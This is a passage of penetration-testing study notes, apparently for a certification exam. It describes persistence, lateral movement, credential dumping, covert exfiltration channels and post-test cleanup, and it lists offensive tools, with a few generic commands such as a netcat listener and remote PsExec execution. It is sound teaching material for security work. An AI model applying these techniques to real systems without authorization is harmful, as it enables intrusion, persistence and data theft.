Function: Handling input and output streams.
Use Case: Automating tasks that involve reading from or writing to files and devices.
Example: Writing scripts to automate data extraction and manipulation tasks.
Data Manipulation
Function: Transforming and processing data.
Use Case: Automating data cleaning, filtering, and transformation.
Example: Parsing and reformatting log files for further analysis or feeding into other tools.
Python
Impacket
Function: Collection of Python classes for working with network protocols.
Use Case: Automating network attacks and post-exploitation tasks.
Example: Writing scripts to perform SMB relay attacks, NTLM relay attacks, and other network-based attacks.
Scapy
Function: Network packet manipulation tool.
Use Case: Automating the creation, manipulation, and analysis of network packets.
Example: Writing scripts to perform custom network attacks and reconnaissance.
Breach and Attack Simulation (BAS)
Caldera
Function: Automated adversary emulation platform.
Caldera is an open-source automated adversary emulation and red teaming platform developed by MITRE.
It is designed to automate the process of simulating sophisticated adversarial tactics, techniques, and procedures (TTPs) within an organization's network.
Caldera provides a way to test and validate security defenses by simulating real-world attacks and is often used in security assessments, red teaming, and adversary emulation exercises.
Features:
Automated Adversary Emulation: Simulates adversary behavior by automating attack scenarios based on the MITRE ATT&CK framework.
Customizable Scenarios: Allows users to create and customize attack scenarios to fit specific security assessment needs.
Modular Architecture: Includes various modules for different attack techniques, enabling flexible and extensible simulations.
Interactive Dashboard: Provides an interface for managing and monitoring simulations, tracking progress, and analyzing results.
Use Case: Simulating advanced persistent threat (APT) behaviors.
Example: Running automated attack scenarios to test defenses and identify weaknesses.
Usage:python3 caldera.py
Infection Monkey
Function: Open-source breach and attack simulation tool.
Infection Monkey is an open-source network security assessment tool developed by Guardicore (now part of Akamai).
It is designed to simulate a malware infection and analyze how well an organization's network security controls can detect and respond to such infections.
The tool focuses on mapping network vulnerabilities and assessing how an infection spreads through the network, helping organizations identify weaknesses and improve their defenses.
Features:
Network Mapping: Visualizes the network topology and identifies potential vulnerabilities and attack paths.
Simulated Malware Spread: Simulates how malware would spread through the network, allowing you to observe the effectiveness of security controls.
Customizable Attack Scenarios: Offers options to customize the attack scenarios and configure the simulated malware behavior.
Interactive Dashboard: Provides a web-based interface for monitoring and managing simulations, visualizing results, and analyzing network security posture.
Use Case: Simulating various attack techniques and paths.
Example: Automating the infection and lateral movement within a network to test security controls.
Atomic Red Team
Function: Library of tests mapped to the MITRE ATT&CK framework.
Atomic Red Team is an open-source project developed by Red Canary, designed to provide a collection of small, atomic tests that simulate real-world adversary behaviors.
These tests are used to evaluate the effectiveness of security controls and detection capabilities against tactics, techniques, and procedures (TTPs) commonly used by attackers, based on the MITRE ATT&CK framework.
Features:
Atomic Tests: Provides a library of simple, focused tests that simulate specific adversary behaviors.
MITRE ATT&CK Mapping: Each test is mapped to MITRE ATT&CK techniques, helping to assess detection and response capabilities.
Modular and Customizable: Tests are designed to be easy to execute and customize, allowing users to adapt them to their specific environments.
Integration: Supports integration with various security tools and platforms for automated testing and analysis.
Use Case: Automating the execution of specific attack techniques.
Example: Running individual tests to verify the effectiveness of security controls against specific attack techniques.
Chapter 5
Objective 5.1
Scheduled Tasks/Cron Jobs
Function: Automating tasks to run at specified times.
Use Case: Setting up periodic execution of malicious scripts or commands.
Example: Creating a cron job to regularly execute a script that maintains a backdoor connection.
Service Creation
Function: Creating system services that run with elevated privileges.
Use Case: Establishing persistence by installing malicious services.
Example: Creating a Windows service that launches a reverse shell upon system startup.
Reverse Shell
Function: Gaining remote access to a target system.
Use Case: Maintaining control over the target by initiating a connection from the target to the attacker.
Example: Using a reverse shell to connect back to the attacker's machine and issue commands.
Bind Shell
Function: Opening a port on the target system for remote access.
Use Case: Allowing the attacker to connect to the target system at any time.
Example: Setting up a bind shell that listens for incoming connections on a specific port.
Add New Accounts
Function: Creating new user accounts with administrative privileges.
Use Case: Ensuring persistent access by adding new accounts to the system.
Example: Adding a new user with administrative rights to the local user database.
Obtain Valid Account Credentials
Function: Acquiring legitimate user credentials.
Use Case: Using valid credentials to maintain access without raising suspicion.
Example: Dumping password hashes and cracking them to gain valid login information.
Registry Keys
Function: Modifying system settings via the registry.
Use Case: Configuring persistence mechanisms that run at startup.
Example: Adding a registry key to execute a script upon user login.
Command and Control (C2) Frameworks
Function: Managing compromised systems from a central location.
Use Case: Coordinating attacks and maintaining persistence across multiple targets.
Example: Using C2 frameworks like Cobalt Strike or Metasploit to issue commands and gather information.
Backdoor
Web Shell
Function: Executing commands on a web server through a web interface.
Use Case: Maintaining access to a compromised web server.
Example: Uploading a PHP web shell to execute commands and navigate the file system.
Trojan
Function: Disguising malicious software as legitimate applications.
Use Case: Establishing persistence by running hidden malicious processes.
Example: Delivering a Trojan horse that provides remote access while appearing benign.
Rootkit
Function: Hiding the presence of malicious processes and files.
Use Case: Maintaining stealthy access to a compromised system.
Example: Installing a rootkit to intercept and alter system calls, hiding the attacker's activities.
Browser Extensions
Function: Extending browser functionality with malicious intent.
Use Case: Maintaining persistence through a compromised browser.
Example: Installing a malicious browser extension that captures credentials and sends them to the attacker.
Tampering Security Controls
Function: Disabling or altering security mechanisms.
Use Case: Ensuring that persistence mechanisms remain undetected.
Example: Disabling antivirus programs or modifying firewall rules to avoid detection.
Objective 5.2
Pivoting
Function: Using a compromised system to access other systems in the network.
Use Case: Expanding the reach within the target environment.
Example: Compromising a workstation and using it to access a restricted server.
Relay Creation
Function: Setting up relays to route traffic through compromised hosts.
Use Case: Obfuscating the attacker's true location and maintaining stealth.
Example: Using an SSH relay to tunnel traffic through a compromised machine.
Enumeration
Service Discovery
Function: Identifying services running on hosts.
Use Case: Finding targets and attack vectors.
Example: Using Nmap to list open ports and services.
Network Traffic Discovery
Function: Monitoring and analyzing network traffic.
Use Case: Identifying active hosts and services.
Example: Using Wireshark to capture and analyze network packets.
Additional Credential Capture
Function: Gathering more credentials from compromised systems.
Use Case: Escalating privileges and moving laterally.
Example: Using Mimikatz to extract passwords from memory.
Credential Dumping
Function: Extracting credentials from memory, files, or other locations.
Use Case: Using these credentials to access other systems.
Example: Dumping NTLM hashes from a Windows machine.
String Searches
Function: Searching for sensitive information in files.
Use Case: Finding passwords, keys, or other useful data.
Example: Using grep to search for "password" in configuration files.
Service Discovery
SMB/Fileshares
Function: Identifying and accessing shared files.
Use Case: Finding sensitive data or further access points.
Example: Enumerating SMB shares with smbclient.
RDP/VNC
Function: Identifying remote desktop services.
Use Case: Gaining graphical access to systems.
Example: Scanning for open RDP ports with Nmap.
SSH
Function: Identifying SSH services.
Use Case: Securely accessing remote systems.
Example: Scanning for SSH services and attempting login with credentials.
Cleartext Protocols
Function: Identifying protocols that transmit data in cleartext.
Use Case: Intercepting sensitive information.
Example: Capturing Telnet traffic with a packet sniffer.
LDAP
Function: Identifying directory services.
Use Case: Extracting user and network information.
Example: Using ldapsearch to query an LDAP directory.
Function: Identifying file transfer protocol services.
Use Case: Transferring files to/from the target.
Example: Connecting to FTP servers with anonymous access.
Telnet
Function: Identifying Telnet services.
Use Case: Gaining remote command-line access.
Example: Logging into Telnet services with cleartext credentials.
HTTP/HTTPS
Function: Identifying web services.
Use Case: Exploiting web applications and interfaces.
Example: Enumerating web servers and discovering web interfaces with Burp Suite.
LPD
Function: Identifying line printer daemon services.
Use Case: Exploiting printer services.
Example: Scanning for LPD services with Nmap.
JetDirect
Function: Identifying printer services.
Use Case: Exploiting printer services.
Example: Enumerating JetDirect printers.
RPC/DCOM
Function: Identifying RPC and DCOM services.
Use Case: Executing commands on remote systems.
Example: Using rpcclient to enumerate RPC services.
Process IDs
Function: Identifying running processes.
Use Case: Finding processes to exploit or terminate.
Example: Using tasklist on Windows to list process IDs.
Window Management Instrumentation (WMI)
Function: Managing and querying system information on Windows.
Use Case: Executing commands and gathering information.
Example: Using WMI to run scripts and commands on remote systems.
Window Remote Management (WinRM)
Function: Remotely managing Windows systems.
Use Case: Executing commands and managing systems remotely.
Example: Using PowerShell Remoting to manage Windows systems.
Tools
Living Off the Land Binaries (LOLBins)
Netstat
Function: Displays network connections and listening ports.
Use Case: Identifying active connections on the system.
Example:netstat -an to list all active connections and listening ports.
Net Commands
Function: Manages network resources, users, and services.
Use Case: Administering network shares, user accounts, and services.
Example:net user to list user accounts.
cmd.exe
Function: Windows command prompt.
Use Case: Executing commands and scripts.
Example: Running batch files or individual commands.
explorer.exe
Function: Windows graphical user interface.
Use Case: Browsing files and directories.
Example:explorer.exe to open the file explorer.
ftp.exe
Function: File Transfer Protocol client.
Use Case: Transferring files to/from remote servers.
Example:ftp.exe <server> to connect to an FTP server.
mmc.exe
Function: Microsoft Management Console.
Use Case: Managing Windows administrative tools.
Example:mmc.exe to open the management console.
rundll
Function: Runs functions exported from DLLs.
Use Case: Executing DLL functions.
Example:rundll32.exe <dllname>,<entrypoint> to execute a function.
msbuild
Function: Builds .NET applications.
Use Case: Compiling and executing code.
Example:msbuild <project>.proj to build a .NET project.
route
Function: Displays and modifies the routing table.
Use Case: Managing network routes.
Example:route print to display the routing table.
strings/findstr.exe
Function: Searches for text strings in files.
Use Case: Finding specific text in files.
Example:findstr <text> <filename> to search for text within a file.
Covenant
Function: Command and control framework.
Covenant is an open-source, .NET-based Command and Control (C2) framework designed for red teaming and penetration testing.
It allows security professionals to simulate advanced attacks, manage compromised hosts, and conduct post-exploitation activities in a controlled manner.
Covenant supports a variety of attack techniques and provides an interactive web-based interface for managing and orchestrating operations.
Use Case: Managing compromised systems and executing commands remotely.
Example: Using Covenant to execute PowerShell scripts on compromised hosts.
CrackMapExec
Function: Post-exploitation tool for managing Windows networks.
Use Case: Automating various tasks such as credential validation and command execution.
Example: Using CrackMapExec to enumerate users and shares.
Impacket
Function: Collection of Python classes for working with network protocols.
Use Case: Scripting and automating network tasks.
Example: Using psexec.py from Impacket to execute commands on remote systems.
Netcat
Function: Network utility for reading and writing data across network connections.
Use Case: Creating reverse or bind shells.
Example:nc -lvp <port> to start a listener.
sshuttle
Function: Transparent proxy server that works as a poor man's VPN.
sshuttle is an open-source tool that provides a simple way to create a VPN-like connection over SSH.
It allows users to forward all traffic from their local machine through an SSH tunnel to a remote server, effectively allowing access to remote networks as if they were directly connected to them.
It's particularly useful for bypassing network restrictions and accessing internal resources securely.
Features:
Transparent Proxy: Routes traffic from your local machine through an SSH tunnel, making it appear as if you're on the remote network.
No Root Required: Operates without needing root privileges on the local machine.
Supports IPv4 and IPv6: Handles both IPv4 and IPv6 traffic.
Simple Setup: Easy to configure and use with minimal setup required.
Use Case: Tunneling traffic through a compromised host.
Example:sshuttle -r user@host 0.0.0.0/0 to tunnel all traffic through an SSH connection.
Usage → sshuttle -r <user@remote_host> <network>
Proxychains
Function: Forces any TCP connection made by any application to follow through proxy like TOR or any other SOCKS4, SOCKS5 or HTTP(S) proxy.
Proxychains is a Linux utility that allows you to force any TCP connection made by any given application to go through a proxy (such as SOCKS or HTTP proxies).
It is especially useful for network penetration testing, privacy, and anonymizing traffic.
Proxychains works by intercepting network calls and redirecting them through specified proxy servers.
Features:
Support for Multiple Proxy Types: Supports SOCKS5, SOCKS4, and HTTP proxies.
Flexible Proxy Chain: Allows chaining multiple proxies to enhance anonymity.
Application Transparency: Routes traffic for any application without requiring modifications to the application itself.
Configuration File: Provides a configuration file where proxies and options are defined.
Use Case: Obfuscating traffic through multiple proxies.
Example:proxychains nmap -sT <target> to run Nmap through proxies.
PowerShell Integrated Scripting Environment (ISE)
Function: Development environment for PowerShell scripts.
PowerShell Integrated Scripting Environment (ISE) is a Microsoft development tool that provides a rich graphical interface for creating, testing, and debugging PowerShell scripts.
It is an integrated environment that enhances the scripting and automation capabilities of PowerShell by offering features like syntax highlighting, IntelliSense, and debugging tools.
Although PowerShell ISE has been deprecated in favor of Visual Studio Code with the PowerShell extension, it is still used in various environments.
Features:
Script Editor: Provides a text editor for writing and editing PowerShell scripts with syntax highlighting.
IntelliSense: Offers auto-completion for commands, parameters, and variables, improving script accuracy and efficiency.
Script Debugger: Includes tools for debugging scripts, such as breakpoints, variable inspection, and step execution.
Integrated Console: Allows you to run and test PowerShell commands interactively within the ISE.
Command Add-ons: Supports custom add-ons and modules to extend functionality.
Use Case: Writing and debugging PowerShell scripts.
Example: Using PowerShell ISE to develop and test scripts for enumeration and exploitation.
Usage: Launch → powershell_ise
Batch Files
Function: Scripts that execute a series of commands in Windows.
Batch files are scripts containing a sequence of commands to be executed by the command-line interpreter (CMD.EXE) on Windows operating systems.
They automate repetitive tasks, manage system configurations, and execute commands in a batch process.
Batch files use a simple scripting language that includes basic programming constructs like loops, conditionals, and variables.
Features:
Command Automation: Automates sequences of command-line operations.
System Configuration: Used for setting environment variables, managing files, and configuring system settings.
Simple Scripting: Employs a straightforward scripting language with basic programming capabilities.
File Extension: Typically saved with the .bat or .cmd file extension.
Use Case: Automating tasks and command sequences.
Example: Creating a batch file to automate network scans.
Metasploit
Function: Penetration testing framework.
Use Case: Exploiting vulnerabilities and managing post-exploitation activities.
Example: Using Metasploit modules to exploit known vulnerabilities and establish sessions.
PsExec
Function: Executes processes on remote systems.
PsExec is a command-line tool from Microsoft’s Sysinternals suite that allows users to execute processes on remote systems and interact with them as if they were running locally.
It can be used for various administrative tasks such as running scripts, installing applications, and managing processes on remote machines.
PsExec is often employed in system administration, troubleshooting, and penetration testing.
Features:
Remote Execution: Run commands and processes on remote systems.
Interactive Session: Launch interactive sessions on remote machines.
Service Management: Start and stop services on remote systems.
File Execution: Execute applications and scripts remotely.
Use Case: Running commands and scripts remotely.
Example:psexec \\<remote_host> -u <user> -p <password> cmd to open a command prompt on a remote machine.
Mimikatz
Function: Post-exploitation tool for extracting plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory.
Mimikatz is an open-source tool developed by Benjamin Delpy that is used for extracting and manipulating authentication credentials from Windows systems.
It is widely used in penetration testing and security research to demonstrate and exploit vulnerabilities related to Windows authentication mechanisms.
Mimikatz can extract plaintext passwords, hash values, and Kerberos tickets, and perform various attacks on Windows authentication protocols.
Use Case: Credential dumping and privilege escalation.
Example: Using Mimikatz to dump Windows password hashes from memory.
Objective 5.3
File Encryption and Compression
Purpose: Protect and reduce the size of files for easier and more secure transfer.
Examples:
Encryption: Using tools like GPG to encrypt files before exfiltration.
Compression: Using ZIP or RAR to compress files, often with added password protection for security.
Covert Channels
Steganography: Hiding data within other non-suspicious data.
Example: Embedding sensitive data in image or audio files.
DNS: Using DNS queries and responses to exfiltrate data.
Example: Encoding data into DNS queries that get sent to an attacker-controlled DNS server.
Internet Control Message Protocol (ICMP): Using ICMP packets (commonly used for ping) to exfiltrate data.
Example: Sending data within ICMP Echo Request and Reply packets.
HTTPS: Encrypting data within HTTPS traffic to avoid detection.
Example: Sending encrypted data through HTTPS to a remote server controlled by the attacker.
Email
Purpose: Sending data as attachments or within the body of emails.
Example: Using a compromised email account to send sensitive files to an external email address.
Cross-Account Resources
Purpose: Using access to multiple accounts or systems to stage and move data.
Example: Moving data between different cloud accounts or using multiple compromised user accounts to exfiltrate data gradually.
Cloud Storage
Purpose: Uploading data to cloud storage services for later retrieval.
Examples:
Google Drive, Dropbox, AWS S3: Uploading sensitive files to these services using compromised credentials
Alternate Data Streams (ADS)
Purpose: Hiding data within NTFS file system streams.
Example: Storing data in an alternate data stream of a legitimate file to avoid detection.
Text Storage Sites
Purpose: Using public paste sites to exfiltrate data.
Examples:
Pastebin, Ghostbin: Posting data to these sites, often in a format that seems harmless or encoded.
Virtual Drive Mounting
Purpose: Mounting remote or virtual drives to store and access data.
Example: Using tools to mount a virtual drive on a compromised system and copying sensitive data to it for later access.
Objective 5.4
Remove Persistence Mechanisms
Objective: Ensure that no backdoors, rootkits, or other persistent threats remain on the system.
Examples:
Deleting scheduled tasks or cron jobs created by the penetration tester.
Removing malicious registry keys or startup entries.
Revert Configuration Changes
Objective: Restore the system to its pre-test state, reversing any changes made during the penetration test.
Examples:
Undoing modifications to system configurations or security settings.
Reverting altered firewall rules or access control lists (ACLs).
Remove Tester-Created Credentials
Objective: Eliminate any user accounts or credentials created during the penetration test.
Examples:
Deleting any test accounts or passwords added during the engagement.
Ensuring all test accounts are fully removed and cannot be used later.
Remove Tools
Objective: Clean up all tools and scripts used during the penetration test to leave no trace.
Examples:
Deleting all binaries, scripts, and files associated with penetration testing tools like Metasploit, Nmap, or custom scripts.
Ensuring no temporary files or logs related to the tools remain on the system.
Spin Down Infrastructure
Objective: Decommission any temporary infrastructure set up for the penetration test.
Examples:
Terminating cloud instances, virtual machines, or containers used during the test.
Ensuring all temporary network configurations are reverted.
Preserve Artifacts
Objective: Keep necessary logs, data, and evidence for reporting and auditing purposes while ensuring no sensitive data remains exposed.
Examples:
Archiving relevant logs, screenshots, and data used to document findings and support the final report.
Ensuring these artifacts are securely stored and only accessible to authorized personnel.
Secure Data Destruction
Objective: Ensure that any sensitive data collected during the penetration test is securely destroyed to prevent unauthorized access.
Examples:
Using secure deletion tools to wipe sensitive files or data.
Following best practices for data destruction, such as overwriting data multiple times or using encryption before deletion.
Tools
Reconnaissance
WHOIS → Tools to gather information from public records about domain ownership.
Nslookup → Tools to help identify the IP addresses associated with an organization.
theHarvester → scours search engines and other resources to find email addresses, employee names, and infrastructure details about an organization.
Recon-ng → A modular web reconnaissance framework that organizes and manages OSINT work.
Censys → A web-based tool that probes IP addresses across the Internet and then pro- vides penetration testers with access to that information through a search engine.
FOCA (Fingerprinting Organizations with Collected Archives) → an open source tool used to find metadata within Office documents, PDFs, and other common file formats.
Shodan → A specialized search engine to provide discovery of vulnerable Internet of Things (IoT) devices from public sources.
Maltego → A commercial product that assists with the visualization of data gathered from OSINT efforts.
Vulnerability Scanners
Nessus → A commercial vulnerability scanning tool used to scan a wide variety of devices.
OpenVAS → An open source alternative to commercial tools such as Nessus. OpenVAS also performs network vulnerability scans.
Sqlmap → An open source tool used to automate SQL injection attacks against web applications with database back ends.
Nikto, Wapiti, and W3AF → Open source web application vulnerability scanners. WPScan is a web application testing tool designed to work with websites running the WordPress content management system.
Security Content Automation Protocol (SCAP) → A set of tools designed to help organi- zations manage compliance with security standards.
Social Engineering
The Social Engineer Toolkit (SET) → Provides a framework for automating the social engi- neering process, including sending spear phishing messages, hosting fake websites, and collecting credentials.
Browser Exploitation Framework (BeEF) → Provides an automated toolkit for using social engineering to take over a victim’s web browser.
Credential Testing Tools
Hashcat, John the Ripper, Hydra, Medusa, Patator, and Cain → Password-cracking tools used to reverse-engineer hashed passwords stored in files.
CeWL → A custom wordlist generator that searches websites for keywords that may be used in password-guessing attacks.
Mimikatz → Retrieves sensitive credential information from memory on Windows systems.
DirBuster → A brute-forcing tool used to enumerate files and directories on a web server.
Debuggers and Software Testing Tools
Immunity Debugger → Designed specifically to support penetration testing and the reverse engineering of malware.
GDB → A widely used open source debugger for Linux that works with a variety of programming languages.
OllyDbg → A Windows debugger that works on binary code at the assembly language level.
WinDbg → Another Windows-specific debugging tool that was created by Microsoft. IDA is a commercial debugging tool that works on Windows, Mac, and Linuxplatforms.
Brakeman → A static software analysis tool used for scanning Ruby on Rails applications.
Covenant → A software security testing tool used for testing .NET applications.
TruffleHog → A tool that scans through code repositories for accidentally published secrets.
Network Testing
Wireshark → A protocol analyzer that allows penetration testers to eavesdrop on and dissect network traffic.
Hping → A command-line tool that allows testers to artificially generate network traffic.
Rogue wireless access points → Used to attract connections from unsuspecting users. - EAPHammer → Used to conduct evil twin attacks against WPA2-Enterprise wireless networks.
Reaver → Used to conduct attacks against networks that support Wi-Fi Protected Setup (WPS).
Spooftooph → Used to perform attacks against Bluetooth-enabled devices.
The Wireless Geographic Logging Engine (WiGLE) → An open database of wireless network information collected by the community and published for open access.
Online SSL checkers → Used to determine whether websites are susceptible to SSL and/ or TLS vulnerabilities.
Remote Access
Secure Shell (SSH) → Provides secure encrypted connections between systems.
Ncat and Netcat → Provide an easy way to read and write data over network connections.
Proxychains → Allows testers to force connections through a proxy server where they may be inspected and altered before being passed on to their final destination.
Exploitation
Metasploit → The most popular exploitation framework and supports thousands of plugins covering different exploits.
SearchSploit → A command-line tool that allows you to search through a database of known exploits.
PowerSploit and Empire → Windows-centric sets of PowerShell scripts that may be used to automate penetration testing tasks.
Responder → A toolkit used to answer NetBIOS queries from Windows systems on a network.
Impacket → A set of network tools that provide low-level access to network protocols.
Mitm6 → A tool used to conduct attacks against IPv6 networks.
CrackMapExec → A set of tools used after gaining access to a network to assess the secu- rity of an Active Directory environment.
Steganography
Open Steg and Steghide → A general-purpose steganography tools used to hide text within images and other binary files.
Coagula → Used to embed text within audio files.
Sonic Visualiser → An audio analysis tool that may be used to detect alterations made by steganography tools.
Snow → Uses whitespace and tabs within a document to hide information.
TinEye → A reverse image search tool that allows security researchers to identify the original image when they suspect steganography is being used.
Metagoofil → Used to extract metadata from a large variety of file types.
Cloud Tools
ScoutSuite → A cloud security auditing tool that can work across commonly used cloud environments.
CloudBrute → A scanner used to identify the cloud components used by an organization. Pacu is a cloud exploitation framework focused on Amazon Web Services (AWS)-hosted environments.
Cloud Custodian → A rule enforcement engine that allows the consistent application of security policies across cloud environments.